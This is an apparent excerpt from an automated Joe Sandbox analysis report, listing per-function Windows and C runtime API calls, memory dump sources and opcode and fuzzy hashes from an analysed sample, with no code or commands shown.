                                                                                                                                                                      • Instruction Fuzzy Hash: 3A0184762043185BDB20FB3AFCC8B5BB7E8EB88614F054959E10687104C738EC46CA60
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CreateFrameInfo.LIBCMT ref: 02BE36A2
                                                                                                                                                                        • Part of subcall function 02BE3232: __getptd.LIBCMT ref: 02BE3240
                                                                                                                                                                        • Part of subcall function 02BE3232: __getptd.LIBCMT ref: 02BE324E
                                                                                                                                                                      • __getptd.LIBCMT ref: 02BE36AC
                                                                                                                                                                        • Part of subcall function 02BD98E6: __getptd_noexit.LIBCMT ref: 02BD98E9
                                                                                                                                                                        • Part of subcall function 02BD98E6: __amsg_exit.LIBCMT ref: 02BD98F6
                                                                                                                                                                      • __getptd.LIBCMT ref: 02BE36BA
                                                                                                                                                                      • __getptd.LIBCMT ref: 02BE36C8
                                                                                                                                                                      • __getptd.LIBCMT ref: 02BE36D3
                                                                                                                                                                        • Part of subcall function 02BE32D7: __CallSettingFrame@12.LIBCMT ref: 02BE3323
                                                                                                                                                                        • Part of subcall function 02BE37A0: __getptd.LIBCMT ref: 02BE37AF
                                                                                                                                                                        • Part of subcall function 02BE37A0: __getptd.LIBCMT ref: 02BE37BD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3282538202-0
                                                                                                                                                                      • Opcode ID: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                                                                                                      • Instruction ID: 42d591befb58631b1973c4ee1c3dff63cea492f20337e83e041cd9ec6e6bfa3c
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f8cf262afac08e33e01d992e0837c391acebccb040fbf70ddcfda8d5a1f53bb
                                                                                                                                                                      • Instruction Fuzzy Hash: D811D4B1C00209DFDF00EFA4C945AEEBBB1FF08314F1085A9E855AB250EB39AA55DF50
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02C64B63
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02C64B6D
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02C64B80
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02C64B83
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                      • Opcode ID: 52235b2d5b058f3df6c3c464c61c4fe8189971ea9273bcfbbb810dec1ee1ce22
                                                                                                                                                                      • Instruction ID: d911d2f81c38a6b7778d3ebd5df164d1411c2145308071dd7eafb282b7956257
                                                                                                                                                                      • Opcode Fuzzy Hash: 52235b2d5b058f3df6c3c464c61c4fe8189971ea9273bcfbbb810dec1ee1ce22
                                                                                                                                                                      • Instruction Fuzzy Hash: 75014F76A006149FD7309B39FCC8BABB7E8EB88365F054929E54683600C774E8498AE0
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 03785012
                                                                                                                                                                        • Part of subcall function 03783E5B: __getptd_noexit.LIBCMT ref: 03783E5E
                                                                                                                                                                        • Part of subcall function 03783E5B: __amsg_exit.LIBCMT ref: 03783E6B
                                                                                                                                                                      • __getptd.LIBCMT ref: 03785029
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 03785037
                                                                                                                                                                      • __lock.LIBCMT ref: 03785047
                                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0378505B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                                      • Opcode ID: 37c25ef8c493497175c2903efd35410a32b049fce5d0f8274ddf471171d4f930
                                                                                                                                                                      • Instruction ID: 60bd9e3e492e015a27c2c2bdddf3c2d099267ba393b0b1d6674ae9408a567699
                                                                                                                                                                      • Opcode Fuzzy Hash: 37c25ef8c493497175c2903efd35410a32b049fce5d0f8274ddf471171d4f930
                                                                                                                                                                      • Instruction Fuzzy Hash: 6AF0B43A9C5705DBE760FB78A809B9D73A0AF05B35F54434ED515AF1C0CB7844428A96
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 02BDE122
                                                                                                                                                                        • Part of subcall function 02BD98E6: __getptd_noexit.LIBCMT ref: 02BD98E9
                                                                                                                                                                        • Part of subcall function 02BD98E6: __amsg_exit.LIBCMT ref: 02BD98F6
                                                                                                                                                                      • __getptd.LIBCMT ref: 02BDE139
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 02BDE147
                                                                                                                                                                      • __lock.LIBCMT ref: 02BDE157
                                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 02BDE16B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                                      • Opcode ID: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                                                                                                      • Instruction ID: 3eaddc9a7267e2f8e7ea1ba371f9d6708206d3d79383aaf030d2c351c14daeff
                                                                                                                                                                      • Opcode Fuzzy Hash: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                                                                                                      • Instruction Fuzzy Hash: 0FF0BE32A44A20ABEB29FBB89801BDD36B2AF04724F1441C9D5546F2D0FB34E880DE56
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 036049D1
                                                                                                                                                                        • Part of subcall function 0360381A: __getptd_noexit.LIBCMT ref: 0360381D
                                                                                                                                                                        • Part of subcall function 0360381A: __amsg_exit.LIBCMT ref: 0360382A
                                                                                                                                                                      • __getptd.LIBCMT ref: 036049E8
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 036049F6
                                                                                                                                                                      • __lock.LIBCMT ref: 03604A06
                                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 03604A1A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                                      • Opcode ID: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                                                                                      • Instruction ID: b9f351466f692f64882b426a0dd701a613879c23b8d6c029373509ed395d7f99
                                                                                                                                                                      • Opcode Fuzzy Hash: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                                                                                      • Instruction Fuzzy Hash: 4FF0903A9463109AE63EFB69980374F77A0AF00721F25825DE654AF3D1CF6449418E5D
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C6E14B
                                                                                                                                                                        • Part of subcall function 02C6990F: __getptd_noexit.LIBCMT ref: 02C69912
                                                                                                                                                                        • Part of subcall function 02C6990F: __amsg_exit.LIBCMT ref: 02C6991F
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C6E162
                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 02C6E170
                                                                                                                                                                      • __lock.LIBCMT ref: 02C6E180
                                                                                                                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 02C6E194
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 938513278-0
                                                                                                                                                                      • Opcode ID: e1f0714e5199d61733fca1c34816c6d619cb01ca18c9bdd399e09fd5de64fa5c
                                                                                                                                                                      • Instruction ID: ac6a7284df639d66f062e3e21f8f473597d8925ba55ea16277e8a0be02a0d3e0
                                                                                                                                                                      • Opcode Fuzzy Hash: e1f0714e5199d61733fca1c34816c6d619cb01ca18c9bdd399e09fd5de64fa5c
                                                                                                                                                                      • Instruction Fuzzy Hash: DAF090329446249BEB25BBB9988DBB933A26F00B24F14821AD455A71C1CB745600FE55
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 0377C932
                                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 0377C938
                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?), ref: 0377C947
                                                                                                                                                                      • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0377C96F
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0377C977
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3421218197-0
                                                                                                                                                                      • Opcode ID: 834a49c94219bc848afb7bab4169a0c7f3de4cdaa536ee173dbfecc814dc2407
                                                                                                                                                                      • Instruction ID: 9a72cf782d05ac7d04c38655f7d8bc18c688d0cd8b0b371d7445d2a6ad038e15
                                                                                                                                                                      • Opcode Fuzzy Hash: 834a49c94219bc848afb7bab4169a0c7f3de4cdaa536ee173dbfecc814dc2407
                                                                                                                                                                      • Instruction Fuzzy Hash: 0FF06D3158431CBBEB20BBA4DC4EFEA7778EB04B00F104795F619AA0D5DA746A45CB54
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 037775D2
                                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 037775D8
                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?), ref: 037775E7
                                                                                                                                                                      • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0377760F
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 03777617
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3421218197-0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 03781CD0: _doexit.LIBCMT ref: 03781CDC
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 0377F9CA
                                                                                                                                                                        • Part of subcall function 03783CA0: TlsGetValue.KERNEL32(00000000,03783DF9,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000,00000000), ref: 03783CA9
                                                                                                                                                                        • Part of subcall function 03783CA0: DecodePointer.KERNEL32(?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000,00000000,?,03783F06,0000000D), ref: 03783CBB
                                                                                                                                                                        • Part of subcall function 03783CA0: TlsSetValue.KERNEL32(00000000,?,03784500,00000000,00000001,00000000,?,03788DE6,00000018,03796448,0000000C,03788E76,00000000,00000000,?,03783F06), ref: 03783CCA
                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 0377F9D5
                                                                                                                                                                        • Part of subcall function 03783C80: TlsGetValue.KERNEL32(?,?,0377F9DA,00000000), ref: 03783C8E
                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 0377F9E8
                                                                                                                                                                        • Part of subcall function 03783CD4: DecodePointer.KERNEL32(?,?,?,0377F9ED,00000000,?,00000000), ref: 03783CE5
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 0377F9F1
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 0377F9F8
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0377F9FE
                                                                                                                                                                      • __freefls@4.LIBCMT ref: 0377FA1E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 781180411-0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 02C682F0: _doexit.LIBCMT ref: 02C682FC
                                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 02C671BC
                                                                                                                                                                        • Part of subcall function 02C69754: TlsGetValue.KERNEL32(00000000,02C698AD,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000,00000000), ref: 02C6975D
                                                                                                                                                                        • Part of subcall function 02C69754: DecodePointer.KERNEL32(?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000,00000000,?,02C699BA,0000000D), ref: 02C6976F
                                                                                                                                                                        • Part of subcall function 02C69754: TlsSetValue.KERNEL32(00000000,?,02C69FB0,00000000,00000001,00000000,?,02C6C0CF,00000018,02C77C70,0000000C,02C6C15F,00000000,00000000,?,02C699BA), ref: 02C6977E
                                                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 02C671C7
                                                                                                                                                                        • Part of subcall function 02C69734: TlsGetValue.KERNEL32(?,?,02C671CC,00000000), ref: 02C69742
                                                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 02C671DA
                                                                                                                                                                        • Part of subcall function 02C69788: DecodePointer.KERNEL32(?,?,?,02C671DF,00000000,?,00000000), ref: 02C69799
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 02C671E3
                                                                                                                                                                      • ExitThread.KERNEL32 ref: 02C671EA
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C671F0
                                                                                                                                                                      • __freefls@4.LIBCMT ref: 02C67210
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 781180411-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0377944A
                                                                                                                                                                        • Part of subcall function 0377EF86: std::exception::exception.LIBCMT ref: 0377EF9B
                                                                                                                                                                        • Part of subcall function 0377EF86: __CxxThrowException@8.LIBCMT ref: 0377EFB0
                                                                                                                                                                        • Part of subcall function 0377EF86: std::exception::exception.LIBCMT ref: 0377EFC1
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 03779482
                                                                                                                                                                        • Part of subcall function 0377EF39: std::exception::exception.LIBCMT ref: 0377EF4E
                                                                                                                                                                        • Part of subcall function 0377EF39: __CxxThrowException@8.LIBCMT ref: 0377EF63
                                                                                                                                                                        • Part of subcall function 0377EF39: std::exception::exception.LIBCMT ref: 0377EF74
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                      • String ID: invalid string position$string too long
                                                                                                                                                                      • API String ID: 1823113695-4289949731
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 037784C9
                                                                                                                                                                        • Part of subcall function 0377EF86: std::exception::exception.LIBCMT ref: 0377EF9B
                                                                                                                                                                        • Part of subcall function 0377EF86: __CxxThrowException@8.LIBCMT ref: 0377EFB0
                                                                                                                                                                        • Part of subcall function 0377EF86: std::exception::exception.LIBCMT ref: 0377EFC1
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 037784E7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                      • String ID: invalid string position$string too long
                                                                                                                                                                      • API String ID: 963545896-4289949731
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___BuildCatchObject.LIBCMT ref: 02BE3A3A
                                                                                                                                                                        • Part of subcall function 02BE3995: ___BuildCatchObjectHelper.LIBCMT ref: 02BE39CB
                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 02BE3A51
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                      • API String ID: 3487967840-3733052814
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 0377D868
                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 0377D938
                                                                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 0377D963
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Read$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2715074504-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __calloc_crt__init_pointers__mtterm
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2478854527-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __calloc_crt__init_pointers__mtterm
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2478854527-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0378A5F6
                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 0378A629
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0378A65A
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0378A6C8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C6E459
                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 02C6E48C
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 02C6E4BD
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 02C6E52B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrlen$_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2425037729-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F), ref: 037743EC
                                                                                                                                                                        • Part of subcall function 037713A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 037713CB
                                                                                                                                                                        • Part of subcall function 037741E0: EnterCriticalSection.KERNEL32(03774FB5,03774E55,037742BE,00000000,?,?,03774E55,?,?,?,?,00000000,000000FF), ref: 037741E8
                                                                                                                                                                        • Part of subcall function 037741E0: LeaveCriticalSection.KERNEL32(03774FB5,?,?,?,00000000,000000FF), ref: 037741F6
                                                                                                                                                                        • Part of subcall function 03774C70: HeapFree.KERNEL32(?,00000000,?,00000000,03774E55,?,037742C8,03774E55,00000000,?,?,03774E55,?), ref: 03774C97
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?), ref: 037743D7
                                                                                                                                                                      • SetLastError.KERNEL32(00000057), ref: 03774401
                                                                                                                                                                      • WSAGetLastError.WS2_32(?), ref: 03774410
                                                                                                                                                                      Memory Dump Source
